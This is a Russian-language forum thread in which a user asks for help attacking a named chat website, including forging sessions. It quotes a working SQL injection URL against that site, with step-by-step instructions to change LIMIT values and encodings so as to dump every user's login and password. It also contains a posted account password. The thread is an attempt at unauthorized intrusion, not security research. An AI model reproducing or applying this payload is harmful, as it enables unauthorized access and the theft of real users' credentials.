Здраствуйте,у меня вопрос касательно одного wap сайта.Заранее извиняюсь если создал тему не в том разделе,но прошу её не удалять при возможности. Вот ссылка на этот сайт chat.artemka.ru .Я прошу помочь с поиском уязвимостей на этом сайте.Если бы вы научили бы меня подделывать сессии,то я был бы очень благодарен.Смотрите: http://chat.artemka.ru/enter/chat.pwml?lid=272384&ss=8d145f8902&rmr=0&rm=13&pv=0&237595259. это инентификационный номер ника- id=272384 , а это номер сессии- ss=8d145f8902 . Когда я например меняю идентификационный номер свой на какой нибудь другой,например 111 вот так - http://chat.artemka.ru/enter/chat.pwml?lid=111&ss=8d145f8902&rmr=0&rm=13&pv=0&237595259 , то выскакивает сообщение "Вход запрещен
Ошибка определения сессии. Возможно время текущей сессии истекло. Пожалуйста, войдите, набрав свой логин и пароль заново." но на другом форуме я нашёл старую переписку,о том что там есть уязвимость и можно узнать логин и пароль спомощью инъекции.Сейчас коперну
Тебе именно уязвимости или хотя бы пароль и логин Админа?
Уязвимость там есть
http://chat.artemka.ru/enter/rm.pwml?lid=258333&ss=f007696792&rm=&pv=&mid=-9029311%27+union+select+1,2,3,concat(id,0x3a,login ,0x3a,name,0x3a,password),user(),6,7,8,9,10+from+u sers+limit+0,1/*&4099

Лимитом перебираешь всех пользователей..

З.Ы.: Только заново зайди и поменяй lid=258333&ss=f007696792 на свое(ид пользователя и номер сессии)
Хм.. нет, ты не понял, это обычная SQL-инъекция, т.е. при открытии страницы:
http://chat.artemka.ru/enter/rm.pwml?lid=258333&ss=f007696792&rm=&pv=&mid=-9029311%27+union+select+1,2,3,concat(id,0x3a,login ,0x3a,name,0x3a,password),user(),6,7,8,9,10+from+u sers+limit+0,1/*&4099

У тебя появляется строка, типа
1:2:3:4, где 1-ID пользователя, 2 - логин, 3 - имя, 4 - пароль
Изменяя в запросе limit+0,1 на limit+1,1 limit+2,1 и т.д., т.е. ты узнаешь ID, логин, имя и пароль всех пользователей..

1):
limit+0,1 заменяешь на limit+1,1 нажимаешь ENTER
потом limit+1,1 заменяешь на limit+2,1 нажимаешь ENTER и т.д...

2)чтобы узнать логин и пароль определенного пользователя, например с id=3456, идешь по такой ссылке:
Код: http://chat.artemka.ru/enter/rm.pwml?lid=258333&ss=f007696792&rm=&pv=&mid=-9029311%27+union+select+1,2,3,concat(id,0x3a,login ,0x3a,name,0x3a,password),user(),6,7,8,9,10+from+u sers+where+id=3456+limit+0,1/*&4099
попробуй заменить
Код:
concat(id,0x3a,login ,0x3a,name,0x3a,password)

сначала на
Код:
convert(concat(id,0x3a,login ,0x3a,name,0x3a,password) using cp1251)

Если не получится, то на
Код:
convert(concat(id,0x3a,login ,0x3a,name,0x3a,password) using utf8)

Возможно нормально отобразится

И всё получилось у этого парня.Но я пробую то же самое,никак не получается.Огромная просьба помогите мне и не удаляйте тему.

| Сообщение посчитали полезным:

WAP еще и существует?
А по делу, Вам бы на --> ][акер <-- обратиться, ну или к гуглу и прочитать про SQL-инъекции

-----
One death is a tragedy, one million is a statistic.

| Сообщение посчитали полезным:

существуетОн для мобильников,но там можно и с ПК сидеть.Вы можете посмотреть на этот сайт?Я могу вам логин и пароль датьможет у Вас что то получится.

| Сообщение посчитали полезным:

Вот Ник: help_my_SOS_SOS_SOS
ID: 225476 пароль 7552 там пожно вместо логина id писать

| Сообщение посчитали полезным:

Выкладывай здесь... все посмотрят )
У меня не сработало, пишет "Данного письма не существует. Вероятно оно было удалено." )
Вероятно пофиксили багу... Если она вообще была!

-----
One death is a tragedy, one million is a statistic.

| Сообщение посчитали полезным:

cd_muxo
Какое отношение данная тема имеет к крекерству?? Гоу ту античат

| Сообщение посчитали полезным:

К форуму отношения не имеет.

| Сообщение посчитали полезным: